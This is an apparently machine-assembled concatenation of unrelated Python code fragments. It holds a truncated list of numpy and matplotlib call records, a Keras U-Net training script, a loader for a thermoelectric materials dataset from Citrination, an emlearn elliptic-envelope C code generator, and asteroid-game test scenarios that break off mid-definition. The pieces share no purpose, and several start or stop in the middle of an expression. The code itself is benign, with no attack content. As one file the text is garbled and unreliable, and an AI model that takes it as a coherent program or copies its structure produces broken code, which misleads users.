'np.pi'], {'num': '(100)'}), '(-np.pi, np.pi, num=100)\n', (4064, 4088), True, 'import numpy as np\n'), ((4205, 4240), 'numpy.linspace', 'np.linspace', (['(-np.pi)', 'np.pi'], {'num': '(100)'}), '(-np.pi, np.pi, num=100)\n', (4216, 4240), True, 'import numpy as np\n'), ((5008, 5024), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(224)'], {}), '(224)\n', (5019, 5024), True, 'import matplotlib.pyplot as plt\n'), ((5315, 5350), 'numpy.linspace', 'np.linspace', (['(-np.pi)', 'np.pi'], {'num': '(100)'}), '(-np.pi, np.pi, num=100)\n', (5326, 5350), True, 'import numpy as np\n'), ((5467, 5502), 'numpy.linspace', 'np.linspace', (['(-np.pi)', 'np.pi'], {'num': '(100)'}), '(-np.pi, np.pi, num=100)\n', (5478, 5502), True, 'import numpy as np\n'), ((6917, 6938), 'matplotlib.pyplot.savefig', 'plt.savefig', (['filename'], {}), '(filename)\n', (6928, 6938), True, 'import matplotlib.pyplot as plt\n'), ((6951, 6960), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (6958, 6960), True, 'import matplotlib.pyplot as plt\n'), ((2089, 2110), 'numpy.degrees', 'np.degrees', (['elevation'], {}), '(elevation)\n', (2099, 2110), True, 'import numpy as np\n'), ((4364, 4383), 'numpy.degrees', 'np.degrees', (['light_x'], {}), '(light_x)\n', (4374, 4383), True, 'import numpy as np\n'), ((4571, 4589), 'numpy.degrees', 'np.degrees', (['wind_x'], {}), '(wind_x)\n', (4581, 4589), True, 'import numpy as np\n'), ((5628, 5647), 'numpy.degrees', 'np.degrees', (['light_x'], {}), '(light_x)\n', (5638, 5647), True, 'import numpy as np\n'), ((5839, 5857), 'numpy.degrees', 'np.degrees', (['wind_x'], {}), '(wind_x)\n', (5849, 5857), True, 'import numpy as np\n'), ((6627, 6656), 
'numpy.linspace', 'np.linspace', (['(-180)', '(180)', 'nbins'], {}), '(-180, 180, nbins)\n', (6638, 6656), True, 'import numpy as np\n'), ((4167, 4182), 'scipy.special.i0', 'i0', (['light_kappa'], {}), '(light_kappa)\n', (4169, 4182), False, 'from scipy.special import i0\n'), ((4315, 4329), 'scipy.special.i0', 'i0', (['wind_kappa'], {}), '(wind_kappa)\n', (4317, 4329), False, 'from scipy.special import i0\n'), ((5429, 5444), 'scipy.special.i0', 'i0', (['light_kappa'], {}), '(light_kappa)\n', (5431, 5444), False, 'from scipy.special import i0\n'), ((5577, 5591), 'scipy.special.i0', 'i0', (['wind_kappa'], {}), '(wind_kappa)\n', (5579, 5591), False, 'from scipy.special import i0\n'), ((6426, 6445), 'numpy.degrees', 'np.degrees', (['changes'], {}), '(changes)\n', (6436, 6445), True, 'import numpy as np\n'), ((6447, 6480), 'numpy.linspace', 'np.linspace', (['(-180)', '(180)', '(nbins + 1)'], {}), '(-180, 180, nbins + 1)\n', (6458, 6480), True, 'import numpy as np\n'), ((6872, 6881), 'matplotlib.pyplot.gcf', 'plt.gcf', ([], {}), '()\n', (6879, 6881), True, 'import matplotlib.pyplot as plt\n'), ((3439, 3456), 'numpy.degrees', 'np.degrees', (['avg_t'], {}), '(avg_t)\n', (3449, 3456), True, 'import numpy as np\n'), ((4130, 4156), 'numpy.cos', 'np.cos', (['(light_x - light_mu)'], {}), '(light_x - light_mu)\n', (4136, 4156), True, 'import numpy as np\n'), ((4280, 4304), 'numpy.cos', 'np.cos', (['(wind_x - wind_mu)'], {}), '(wind_x - wind_mu)\n', (4286, 4304), True, 'import numpy as np\n'), ((5392, 5418), 'numpy.cos', 'np.cos', (['(light_x - light_mu)'], {}), '(light_x - light_mu)\n', (5398, 5418), True, 'import numpy as np\n'), ((5542, 5566), 'numpy.cos', 'np.cos', (['(wind_x - wind_mu)'], {}), '(wind_x - wind_mu)\n', (5548, 5566), True, 'import numpy as np\n')]
|
import os
"""
# If you have multiple GPUs, designate which GPU to use.
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = "6"
"""
import argparse
import logging
from tqdm import tqdm # progress bar
import numpy as np
import matplotlib.pyplot as plt
from keras import optimizers
from keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau
import segmentation_models as sm
from segmentation_models.utils import set_trainable
from dataset import DataGenerator
def train_model(model, train_gen, valid_gen, epochs, batch_size, save_cp=True):
total_batch_count = 0
train_batch_num = len(train_gen)
train_num = train_batch_num * batch_size
#train_gen_out = iter_sequence_infinite(train_gen)
valid_batch_num = len(valid_gen)
valid_num = valid_batch_num * batch_size
#valid_gen_out = iter_sequence_infinite(valid_gen)
for epoch in range(epochs): # interation as many epochs
set_trainable(model)
epoch_loss = 0 # loss in this epoch
epoch_iou = 0
count = 0
with tqdm(total=train_num, desc=f'Epoch {epoch + 1}/{epochs}', position=0, leave=True, unit='img') as pbar: # make progress bar
for batch in train_gen:
#batch = next(train_gen_out)
imgs = batch[0]
true_masks = batch[1]
loss, iou = model.train_on_batch(imgs, true_masks) # value of loss of this batch
epoch_loss += loss
epoch_iou += iou
                pbar.set_postfix(**{'Batch loss': loss, 'Batch IoU': iou})  # show batch loss/IoU in the progress-bar postfix
pbar.update(imgs.shape[0]) # update progress
count += 1
total_batch_count += 1
print( "Epoch : loss: {}, IoU : {}".format(epoch_loss/count, epoch_iou/count))
# Do validation
validation_model(model, valid_gen, valid_num)
train_gen.on_epoch_end()
valid_gen.on_epoch_end()
if save_cp:
try:
if not os.path.isdir(checkpoint_dir):
os.mkdir(checkpoint_dir)
logging.info('Created checkpoint directory')
else:
pass
except OSError:
pass
model.save_weights(os.path.join(checkpoint_dir , f'CP_epoch{epoch + 1}.h5'))
logging.info(f'Checkpoint {epoch + 1} saved !')
def validation_model(model, valid_gen, valid_num):
epoch_loss = 0 # loss in this epoch
epoch_iou = 0
count = 0
with tqdm(total=valid_num, desc='Validation round', position=0, leave=True, unit='img') as pbar: # make progress bar
for batch in valid_gen:
#batch = next(valid_gen_out)
imgs = batch[0]
true_masks = batch[1]
loss, iou = model.test_on_batch(imgs, true_masks) # value of loss of this batch
epoch_loss += loss
epoch_iou += iou
            pbar.set_postfix(**{'Batch loss': loss, 'Batch IoU': iou})  # show batch loss/IoU in the progress-bar postfix
pbar.update(imgs.shape[0]) # update progress
count += 1
print("Validation loss: {}, IoU: {}".format(epoch_loss / count, epoch_iou / count))
pred_mask = model.predict(np.expand_dims(imgs[0],0))
plt.subplot(131)
plt.imshow(imgs[0])
plt.subplot(132)
plt.imshow(true_masks[0].squeeze(), cmap="gray")
plt.subplot(133)
plt.imshow(pred_mask.squeeze(), cmap="gray")
plt.show()
print()
def get_args():
parser = argparse.ArgumentParser(description='Train the UNet on images and target masks',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-e', '--epochs', metavar='E', type=int, default=100,
help='Number of epochs', dest='epochs')
parser.add_argument('-b', '--batch_size', metavar='B', type=int, nargs='?', default=4,
help='Batch size', dest='batch_size')
parser.add_argument('-l', '--learning-rate', metavar='LR', type=float, nargs='?', default=1e-4,
help='Learning rate', dest='lr')
parser.add_argument('-bb', '--backbone', default='resnet50', metavar='FILE',
help="backcone name")
parser.add_argument('-w', '--weight', dest='load', type=str, default=False,
help='Load model from a .h5 file')
parser.add_argument('-s', '--resizing', dest='resizing', type=int, default=384,
help='Downscaling factor of the images')
parser.add_argument('-v', '--validation', dest='val', type=float, default=20.0,
help='Percent of the data that is used as validation (0-100)')
return parser.parse_args()
if __name__ == '__main__':
img_dir = '../data/train/imgs/' # ./data/train/imgs/CVC_Original/'
mask_dir = '../data/train/masks/' # ./data/train/masks/CVC_Ground Truth/'
checkpoint_dir = './checkpoints'
args = get_args()
# train path
train_ids = os.listdir(img_dir)
# Validation Data Size
n_val = int(len(train_ids) * args.val/100) # size of validation set
valid_ids = train_ids[:n_val] # list of image ids used for validation of result 0 to 9
train_ids = train_ids[n_val:] # list of image ids used for training dataset
# print(valid_ids, "\n\n")
print("training_size: ", len(train_ids), "validation_size: ", len(valid_ids))
train_gen = DataGenerator(train_ids, img_dir, mask_dir, img_size=args.resizing, batch_size=args.batch_size)
valid_gen = DataGenerator(valid_ids, img_dir, mask_dir, img_size=args.resizing, batch_size=args.batch_size)
print("total training batches: ", len(train_gen))
print("total validaton batches: ", len(valid_gen))
train_steps = len(train_ids) // args.batch_size
valid_steps = len(valid_ids) // args.batch_size
# define model
model = sm.Unet(args.backbone, encoder_weights='imagenet')
optimizer = optimizers.Adam(lr=args.lr, decay=1e-4)
model.compile(
optimizer=optimizer,
# "Adam",
loss=sm.losses.bce_dice_loss, # sm.losses.bce_jaccard_loss, # sm.losses.binary_crossentropy,
metrics=[sm.metrics.iou_score],
)
#model.summary()
callbacks = [
EarlyStopping(patience=6, verbose=1),
ReduceLROnPlateau(factor=0.1, patience=3, min_lr=1e-7, verbose=1),
ModelCheckpoint('./weights.Epoch{epoch:02d}-Loss{loss:.3f}-VIou{val_iou_score:.3f}.h5', verbose=1,
monitor='val_accuracy', save_best_only=True, save_weights_only=True)
]
train_model(model=model, train_gen=train_gen,
valid_gen=valid_gen, epochs=args.epochs, batch_size=args.batch_size)
|
[
"matplotlib.pyplot.imshow",
"keras.optimizers.Adam",
"os.listdir",
"segmentation_models.utils.set_trainable",
"argparse.ArgumentParser",
"keras.callbacks.ModelCheckpoint",
"keras.callbacks.ReduceLROnPlateau",
"tqdm.tqdm",
"os.path.join",
"logging.info",
"os.path.isdir",
"dataset.DataGenerator",
"os.mkdir",
"numpy.expand_dims",
"keras.callbacks.EarlyStopping",
"matplotlib.pyplot.subplot",
"segmentation_models.Unet",
"matplotlib.pyplot.show"
] |
[((3351, 3367), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(131)'], {}), '(131)\n', (3362, 3367), True, 'import matplotlib.pyplot as plt\n'), ((3372, 3391), 'matplotlib.pyplot.imshow', 'plt.imshow', (['imgs[0]'], {}), '(imgs[0])\n', (3382, 3391), True, 'import matplotlib.pyplot as plt\n'), ((3396, 3412), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(132)'], {}), '(132)\n', (3407, 3412), True, 'import matplotlib.pyplot as plt\n'), ((3470, 3486), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(133)'], {}), '(133)\n', (3481, 3486), True, 'import matplotlib.pyplot as plt\n'), ((3540, 3550), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3548, 3550), True, 'import matplotlib.pyplot as plt\n'), ((3594, 3740), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Train the UNet on images and target masks"""', 'formatter_class': 'argparse.ArgumentDefaultsHelpFormatter'}), "(description=\n 'Train the UNet on images and target masks', formatter_class=argparse.\n ArgumentDefaultsHelpFormatter)\n", (3617, 3740), False, 'import argparse\n'), ((5111, 5130), 'os.listdir', 'os.listdir', (['img_dir'], {}), '(img_dir)\n', (5121, 5130), False, 'import os\n'), ((5536, 5635), 'dataset.DataGenerator', 'DataGenerator', (['train_ids', 'img_dir', 'mask_dir'], {'img_size': 'args.resizing', 'batch_size': 'args.batch_size'}), '(train_ids, img_dir, mask_dir, img_size=args.resizing,\n batch_size=args.batch_size)\n', (5549, 5635), False, 'from dataset import DataGenerator\n'), ((5648, 5747), 'dataset.DataGenerator', 'DataGenerator', (['valid_ids', 'img_dir', 'mask_dir'], {'img_size': 'args.resizing', 'batch_size': 'args.batch_size'}), '(valid_ids, img_dir, mask_dir, img_size=args.resizing,\n batch_size=args.batch_size)\n', (5661, 5747), False, 'from dataset import DataGenerator\n'), ((5990, 6040), 'segmentation_models.Unet', 'sm.Unet', (['args.backbone'], {'encoder_weights': '"""imagenet"""'}), "(args.backbone, encoder_weights='imagenet')\n", (5997, 6040), True, 'import segmentation_models as sm\n'), ((6058, 6099), 'keras.optimizers.Adam', 'optimizers.Adam', ([], {'lr': 'args.lr', 'decay': '(0.0001)'}), '(lr=args.lr, decay=0.0001)\n', (6073, 6099), False, 'from keras import optimizers\n'), ((964, 984), 'segmentation_models.utils.set_trainable', 'set_trainable', (['model'], {}), '(model)\n', (977, 984), False, 'from segmentation_models.utils import set_trainable\n'), ((2599, 2686), 'tqdm.tqdm', 'tqdm', ([], {'total': 'valid_num', 'desc': '"""Validation round"""', 'position': '(0)', 'leave': '(True)', 'unit': '"""img"""'}), "(total=valid_num, desc='Validation round', position=0, leave=True, unit\n ='img')\n", (2603, 2686), False, 'from tqdm import tqdm\n'), ((3320, 3346), 'numpy.expand_dims', 'np.expand_dims', (['imgs[0]', '(0)'], {}), '(imgs[0], 0)\n', (3334, 3346), True, 'import numpy as np\n'), ((6367, 6403), 'keras.callbacks.EarlyStopping', 'EarlyStopping', ([], {'patience': '(6)', 'verbose': '(1)'}), '(patience=6, verbose=1)\n', (6380, 6403), False, 'from keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau\n'), ((6413, 6479), 'keras.callbacks.ReduceLROnPlateau', 'ReduceLROnPlateau', ([], {'factor': '(0.1)', 'patience': '(3)', 'min_lr': '(1e-07)', 'verbose': '(1)'}), '(factor=0.1, patience=3, min_lr=1e-07, verbose=1)\n', (6430, 6479), False, 'from keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau\n'), ((6488, 6668), 'keras.callbacks.ModelCheckpoint', 'ModelCheckpoint', 
(['"""./weights.Epoch{epoch:02d}-Loss{loss:.3f}-VIou{val_iou_score:.3f}.h5"""'], {'verbose': '(1)', 'monitor': '"""val_accuracy"""', 'save_best_only': '(True)', 'save_weights_only': '(True)'}), "(\n './weights.Epoch{epoch:02d}-Loss{loss:.3f}-VIou{val_iou_score:.3f}.h5',\n verbose=1, monitor='val_accuracy', save_best_only=True,\n save_weights_only=True)\n", (6503, 6668), False, 'from keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau\n'), ((1092, 1190), 'tqdm.tqdm', 'tqdm', ([], {'total': 'train_num', 'desc': 'f"""Epoch {epoch + 1}/{epochs}"""', 'position': '(0)', 'leave': '(True)', 'unit': '"""img"""'}), "(total=train_num, desc=f'Epoch {epoch + 1}/{epochs}', position=0, leave\n =True, unit='img')\n", (1096, 1190), False, 'from tqdm import tqdm\n'), ((2416, 2463), 'logging.info', 'logging.info', (['f"""Checkpoint {epoch + 1} saved !"""'], {}), "(f'Checkpoint {epoch + 1} saved !')\n", (2428, 2463), False, 'import logging\n'), ((2346, 2401), 'os.path.join', 'os.path.join', (['checkpoint_dir', 'f"""CP_epoch{epoch + 1}.h5"""'], {}), "(checkpoint_dir, f'CP_epoch{epoch + 1}.h5')\n", (2358, 2401), False, 'import os\n'), ((2078, 2107), 'os.path.isdir', 'os.path.isdir', (['checkpoint_dir'], {}), '(checkpoint_dir)\n', (2091, 2107), False, 'import os\n'), ((2129, 2153), 'os.mkdir', 'os.mkdir', (['checkpoint_dir'], {}), '(checkpoint_dir)\n', (2137, 2153), False, 'import os\n'), ((2174, 2218), 'logging.info', 'logging.info', (['"""Created checkpoint directory"""'], {}), "('Created checkpoint directory')\n", (2186, 2218), False, 'import logging\n')]
|
## Data Loader: TE-CCA zT Dataset
# <NAME> (<EMAIL>) 2021-03-12
#
from citrination_client import CitrinationClient, PifSystemReturningQuery
from citrination_client import DataQuery, DatasetQuery, Filter
from matminer.featurizers.base import MultipleFeaturizer
from matminer.featurizers import composition as cf
from pymatgen import Composition
from sl_utils import pifs2df, setResDir
import pandas as pd
import numpy as np
import os
import time
prefix = "zT"
file_responses = prefix + "_responses.csv"
file_features = prefix + "_features.csv"
## Helper functions
def get_composition(c):
"""Attempt to parse composition, return None if failed"""
try:
return Composition(c)
except:
return None
def load_data_zT():
results_dir = setResDir()
## Metadata
keys_response = [
'Seebeck coefficient; squared',
'Electrical resistivity',
'Thermal conductivity'
]
sign = np.array([
+1, # Seebeck
-1, # Electric resistivity
-1 # Thermal conductivity
])
## Load data, if possible
# --------------------------------------------------
try:
df_X_all = pd.read_csv(results_dir + file_features)
X_all = df_X_all.drop(df_X_all.columns[0], axis = 1).values
df_Y_all = pd.read_csv(results_dir + file_responses)
Y_all = df_Y_all.drop(df_Y_all.columns[0], axis = 1).values
print("Cached data loaded.")
except FileNotFoundError:
## Data Import
# --------------------------------------------------
# Initialize client
print("Accessing data from Citrination...")
site = 'https://citrination.com' # Citrination
client = CitrinationClient(api_key=os.environ['CITRINATION_API_KEY'], site=site)
search_client = client.search
# Aluminum dataset
dataset_id = 178480 # ucsb_te_roomtemp_seebeck
system_query = PifSystemReturningQuery(
size=1000,
query=DataQuery(
dataset=DatasetQuery(id=Filter(equal=str(dataset_id)))
)
)
query_result = search_client.pif_search(system_query)
print(" Found {} PIFs in dataset {}.".format(
query_result.total_num_hits,
dataset_id
))
## Wrangle
# --------------------------------------------------
pifs = [x.system for x in query_result.hits]
# Utility function will tabularize PIFs
df_response = pifs2df(pifs)
# Down-select columns to play well with to_numeric
df_response = df_response[
['Seebeck coefficient', 'Electrical resistivity', 'Thermal conductivity']
]
df_response = df_response.apply(pd.to_numeric)
# Parse chemical compositions
formulas = [pif.chemical_formula for pif in pifs]
df_comp = pd.DataFrame(
columns = ['chemical_formula'],
data = formulas
)
# Join
df_data = pd.concat([df_comp, df_response], axis = 1)
print(" Accessed data.")
# Featurize
print("Featurizing data...")
        df_data['composition'] = df_data['chemical_formula'].apply(get_composition)
f = MultipleFeaturizer([
cf.Stoichiometry(),
cf.ElementProperty.from_preset("magpie"),
cf.ValenceOrbital(props=['avg']),
cf.IonProperty(fast=True)
])
X = np.array(f.featurize_many(df_data['composition']))
# Find valid response values
keys_original = [
'Seebeck coefficient',
'Electrical resistivity',
'Thermal conductivity'
]
index_valid_response = {
key: df_data[key].dropna().index.values for key in keys_original
}
index_valid_all = df_data[keys_original].dropna().index.values
X_all = X[index_valid_all, :]
Y_all = df_data[keys_original].iloc[index_valid_all].values
# Manipulate columns for proper objective values
Y_all[:, 0] = Y_all[:, 0] ** 2 # Squared seebeck
print(" Data prepared; {0:} valid observations.".format(X_all.shape[0]))
# Cache data
pd.DataFrame(data = X_all).to_csv(results_dir + file_features)
pd.DataFrame(
data = Y_all,
columns = keys_response
).to_csv(results_dir + file_responses)
print("Data cached in results directory.")
return X_all, Y_all, sign, keys_response, prefix
if __name__ == "__main__":
X_all, Y_all, sign, keys_response, prefix = load_data_zT()
|
[
"matminer.featurizers.composition.ValenceOrbital",
"pandas.read_csv",
"citrination_client.CitrinationClient",
"sl_utils.setResDir",
"numpy.array",
"pandas.DataFrame",
"matminer.featurizers.composition.IonProperty",
"matminer.featurizers.composition.Stoichiometry",
"pymatgen.Composition",
"pandas.concat",
"matminer.featurizers.composition.ElementProperty.from_preset",
"sl_utils.pifs2df"
] |
[((764, 775), 'sl_utils.setResDir', 'setResDir', ([], {}), '()\n', (773, 775), False, 'from sl_utils import pifs2df, setResDir\n'), ((940, 962), 'numpy.array', 'np.array', (['[+1, -1, -1]'], {}), '([+1, -1, -1])\n', (948, 962), True, 'import numpy as np\n'), ((678, 692), 'pymatgen.Composition', 'Composition', (['c'], {}), '(c)\n', (689, 692), False, 'from pymatgen import Composition\n'), ((1169, 1209), 'pandas.read_csv', 'pd.read_csv', (['(results_dir + file_features)'], {}), '(results_dir + file_features)\n', (1180, 1209), True, 'import pandas as pd\n'), ((1298, 1339), 'pandas.read_csv', 'pd.read_csv', (['(results_dir + file_responses)'], {}), '(results_dir + file_responses)\n', (1309, 1339), True, 'import pandas as pd\n'), ((1712, 1783), 'citrination_client.CitrinationClient', 'CitrinationClient', ([], {'api_key': "os.environ['CITRINATION_API_KEY']", 'site': 'site'}), "(api_key=os.environ['CITRINATION_API_KEY'], site=site)\n", (1729, 1783), False, 'from citrination_client import CitrinationClient, PifSystemReturningQuery\n'), ((2501, 2514), 'sl_utils.pifs2df', 'pifs2df', (['pifs'], {}), '(pifs)\n', (2508, 2514), False, 'from sl_utils import pifs2df, setResDir\n'), ((2879, 2936), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['chemical_formula']", 'data': 'formulas'}), "(columns=['chemical_formula'], data=formulas)\n", (2891, 2936), True, 'import pandas as pd\n'), ((3012, 3053), 'pandas.concat', 'pd.concat', (['[df_comp, df_response]'], {'axis': '(1)'}), '([df_comp, df_response], axis=1)\n', (3021, 3053), True, 'import pandas as pd\n'), ((3280, 3298), 'matminer.featurizers.composition.Stoichiometry', 'cf.Stoichiometry', ([], {}), '()\n', (3296, 3298), True, 'from matminer.featurizers import composition as cf\n'), ((3312, 3352), 'matminer.featurizers.composition.ElementProperty.from_preset', 'cf.ElementProperty.from_preset', (['"""magpie"""'], {}), "('magpie')\n", (3342, 3352), True, 'from matminer.featurizers import composition as cf\n'), ((3366, 3398), 'matminer.featurizers.composition.ValenceOrbital', 'cf.ValenceOrbital', ([], {'props': "['avg']"}), "(props=['avg'])\n", (3383, 3398), True, 'from matminer.featurizers import composition as cf\n'), ((3412, 3437), 'matminer.featurizers.composition.IonProperty', 'cf.IonProperty', ([], {'fast': '(True)'}), '(fast=True)\n', (3426, 3437), True, 'from matminer.featurizers import composition as cf\n'), ((4252, 4276), 'pandas.DataFrame', 'pd.DataFrame', ([], {'data': 'X_all'}), '(data=X_all)\n', (4264, 4276), True, 'import pandas as pd\n'), ((4323, 4370), 'pandas.DataFrame', 'pd.DataFrame', ([], {'data': 'Y_all', 'columns': 'keys_response'}), '(data=Y_all, columns=keys_response)\n', (4335, 4370), True, 'import pandas as pd\n')]
|
import os.path
import os
import numpy
from . import common, cgen
"""
References
https://github.com/scikit-learn/scikit-learn/blob/15a949460dbf19e5e196b8ef48f9712b72a3b3c3/sklearn/covariance/_empirical_covariance.py#L297
https://github.com/scikit-learn/scikit-learn/blob/15a949460dbf19e5e196b8ef48f9712b72a3b3c3/sklearn/covariance/_elliptic_envelope.py#L149
"""
from sklearn.mixture._gaussian_mixture import _compute_log_det_cholesky
from sklearn.utils.extmath import row_norms
np = numpy
def squared_mahalanobis_distance(x1, x2, precision):
"""
@precision is the inverted covariance matrix
computes (x1 - x2).T * VI * (x1 - x2)
where VI is the precision matrix, the inverse of the covariance matrix
Loosely based on the scikit-learn implementation,
https://github.com/scikit-learn/scikit-learn/blob/main/sklearn/neighbors/_dist_metrics.pyx
"""
distance = 0.0
size = x1.shape[0]
temp = numpy.zeros(shape=size)
assert x1.shape == x2.shape
assert precision.shape[0] == precision.shape[1]
assert size == precision.shape[0]
for i in range(size):
accumulate = 0
for j in range(size):
accumulate += precision[i, j] * (x1[j] - x2[j])
distance += accumulate * (x1[i] - x2[i])
return distance
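# Illustrative check (added note, not part of the original module): the loop above
# is equivalent to the matrix form (x1 - x2)^T VI (x1 - x2), e.g. with numpy:
#
#   >>> x1 = numpy.array([1.0, 2.0]); x2 = numpy.array([0.0, 0.0])
#   >>> precision = numpy.eye(2)
#   >>> squared_mahalanobis_distance(x1, x2, precision)   # -> 5.0
#   >>> diff = x1 - x2; float(diff @ precision @ diff)    # -> 5.0, same value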
def generate_code(means, precision, offset, name='my_elliptic', modifiers='static const'):
n_features = means.shape[0]
decision_boundary = offset # FIXME, check
classifier_name = f'{name}_classifier'
means_name = f'{name}_means'
precisions_name = f'{name}_precisions'
predict_function_name = f'{name}_predict'
includes = '''
// This code is generated by emlearn
#include <eml_distance.h>
'''
pre = '\n\n'.join([
includes,
cgen.array_declare(means_name, n_features, modifiers=modifiers, values=means),
cgen.array_declare(precisions_name, n_features*n_features,
modifiers=modifiers,
values=precision.flatten(order='C'),
),
])
main = f'''
#include <stdio.h>
// Data definitions
{modifiers} EmlEllipticEnvelope {classifier_name} = {{
{n_features},
{decision_boundary},
{means_name},
{precisions_name}
}};
// Prediction function
float {predict_function_name}(const float *features, int n_features) {{
float dist = 0.0;
const int class = eml_elliptic_envelope_predict(&{classifier_name},
features, n_features, &dist);
return dist;
}}
'''
code = pre + main
return code
class Wrapper:
def __init__(self, estimator, classifier='inline', dtype='float'):
self.dtype = dtype
precision = estimator.get_precision()
self._means = estimator.location_.copy()
self._precision = precision
self._offset = estimator.offset_
if classifier == 'inline':
name = 'my_inline_elliptic'
func = '{}_predict(values, length)'.format(name)
code = self.save(name=name)
self.classifier_ = common.CompiledClassifier(code, name=name, call=func, out_dtype='float')
else:
raise ValueError("Unsupported classifier method '{}'".format(classifier))
def mahalanobis(self, X):
def dist(x):
return squared_mahalanobis_distance(x, self._means, precision=self._precision)
p = numpy.array([ dist(x) for x in X ])
predictions = self.classifier_.predict(X)
return predictions
def predict(self, X):
def predict_one(d):
dist = -d
dd = dist - self._offset
is_inlier = 1 if dd > 0 else -1
return is_inlier
distances = self.mahalanobis(X)
return numpy.array([predict_one(d) for d in distances])
def save(self, name=None, file=None):
if name is None:
if file is None:
raise ValueError('Either name or file must be provided')
else:
name = os.path.splitext(os.path.basename(file))[0]
code = generate_code(self._means, self._precision, self._offset, name=name)
if file:
with open(file, 'w') as f:
f.write(code)
return code
|
[
"numpy.zeros",
"os.path.basename"
] |
[((942, 965), 'numpy.zeros', 'numpy.zeros', ([], {'shape': 'size'}), '(shape=size)\n', (953, 965), False, 'import numpy\n'), ((4073, 4095), 'os.path.basename', 'os.path.basename', (['file'], {}), '(file)\n', (4089, 4095), False, 'import os\n')]
|
from fuzzy_asteroids.util import Scenario
import numpy as np
# "Simple" Scenarios --------------------------------------------------------------------------------------------------#
# Threat priority tests
threat_test_1 = Scenario(
name="threat_test_1",
asteroid_states=[{"position": (0, 300), "angle": -90.0, "speed": 40},
{"position": (700, 300), "angle": 0.0, "speed": 0},
],
ship_state={"position": (600, 300)},
seed=0
)
threat_test_2 = Scenario(
name="threat_test_2",
asteroid_states=[{"position": (800, 300), "angle": 90.0, "speed": 40},
{"position": (100, 300), "angle": 0.0, "speed": 0},
],
ship_state={"position": (200, 300)},
seed=0
)
threat_test_3 = Scenario(
name="threat_test_3",
asteroid_states=[{"position": (400, 0), "angle": 0.0, "speed": 40},
{"position": (400, 550), "angle": 0.0, "speed": 0},
],
ship_state={"position": (400, 450)},
seed=0
)
threat_test_4 = Scenario(
name="threat_test_4",
asteroid_states=[{"position": (400, 600), "angle": 180.0, "speed": 40},
{"position": (400, 50), "angle": 0.0, "speed": 0},
],
ship_state={"position": (400, 150)},
seed=0
)
# Accuracy tests
accuracy_test_1 = Scenario(
name="accuracy_test_1",
asteroid_states=[{"position": (400, 500), "angle": 90.0, "speed": 120, "size": 1},
],
ship_state={"position": (400, 100)},
seed=0
)
accuracy_test_2 = Scenario(
name="accuracy_test_2",
asteroid_states=[{"position": (400, 500), "angle": -90.0, "speed": 120, "size": 1},
],
ship_state={"position": (400, 100)},
seed=0
)
accuracy_test_3 = Scenario(
name="accuracy_test_3",
asteroid_states=[{"position": (100, 100), "angle": 0.0, "speed": 120, "size": 1},
],
ship_state={"position": (400, 100)},
seed=0
)
accuracy_test_4 = Scenario(
name="accuracy_test_4",
asteroid_states=[{"position": (700, 100), "angle": 0.0, "speed": 120, "size": 1},
],
ship_state={"position": (400, 100)},
seed=0
)
accuracy_test_5 = Scenario(
name="accuracy_test_5",
asteroid_states=[{"position": (100, 500), "angle": 180.0, "speed": 120, "size": 1},
],
ship_state={"position": (400, 100)},
seed=0
)
accuracy_test_6 = Scenario(
name="accuracy_test_6",
asteroid_states=[{"position": (700, 500), "angle": 180.0, "speed": 120, "size": 1},
],
ship_state={"position": (400, 100)},
seed=0
)
accuracy_test_7 = Scenario(
name="accuracy_test_7",
asteroid_states=[{"position": (400, 500), "angle": 180.0, "speed": 120, "size": 1},
],
ship_state={"position": (400, 100), "angle": 90.0},
seed=0
)
accuracy_test_8 = Scenario(
name="accuracy_test_8",
asteroid_states=[{"position": (400, 500), "angle": 180.0, "speed": 120, "size": 1},
],
ship_state={"position": (400, 100), "angle": -90.0},
seed=0
)
accuracy_test_9 = Scenario(
name="accuracy_test_9",
asteroid_states=[{"position": (100, 500), "angle": -135.0, "speed": 120, "size": 1},
],
ship_state={"position": (700, 100), "angle": -90.0},
seed=0
)
accuracy_test_10 = Scenario(
name="accuracy_test_10",
asteroid_states=[{"position": (700, 500), "angle": 135.0, "speed": 120, "size": 1},
],
ship_state={"position": (100, 100), "angle": 90.0},
seed=0
)
# "Easy" wall scenario with default ship state, starts on left and moves right
wall_left_easy = Scenario(
name="wall_left_easy",
asteroid_states=[{"position": (0, 100), "angle": -90.0, "speed": 60},
{"position": (0, 200), "angle": -90.0, "speed": 60},
{"position": (0, 300), "angle": -90.0, "speed": 60},
{"position": (0, 400), "angle": -90.0, "speed": 60},
{"position": (0, 500), "angle": -90.0, "speed": 60},
],
ship_state={"position": (400, 300)},
seed=0
)
# "Easy" wall scenario with default ship state, starts on right and moves left
wall_right_easy = Scenario(
name="wall_right_easy",
asteroid_states=[{"position": (800, 100), "angle": 90.0, "speed": 60},
{"position": (800, 200), "angle": 90.0, "speed": 60},
{"position": (800, 300), "angle": 90.0, "speed": 60},
{"position": (800, 400), "angle": 90.0, "speed": 60},
{"position": (800, 500), "angle": 90.0, "speed": 60},
],
ship_state={"position": (400, 300)},
seed=0
)
# "Easy" wall scenario with default ship state, starts at the top and moves downward
wall_top_easy = Scenario(
name="wall_top_easy",
asteroid_states=[{"position": (100, 600), "angle": 180.0, "speed": 60},
{"position": (200, 600), "angle": 180.0, "speed": 60},
{"position": (300, 600), "angle": 180.0, "speed": 60},
{"position": (400, 600), "angle": 180.0, "speed": 60},
{"position": (500, 600), "angle": 180.0, "speed": 60},
{"position": (600, 600), "angle": 180.0, "speed": 60},
{"position": (700, 600), "angle": 180.0, "speed": 60},
],
ship_state={"position": (400, 300)},
seed=0
)
# "Easy" wall scenario with default ship state, starts at the top and moves downward
wall_bottom_easy = Scenario(
name="wall_bottom_easy",
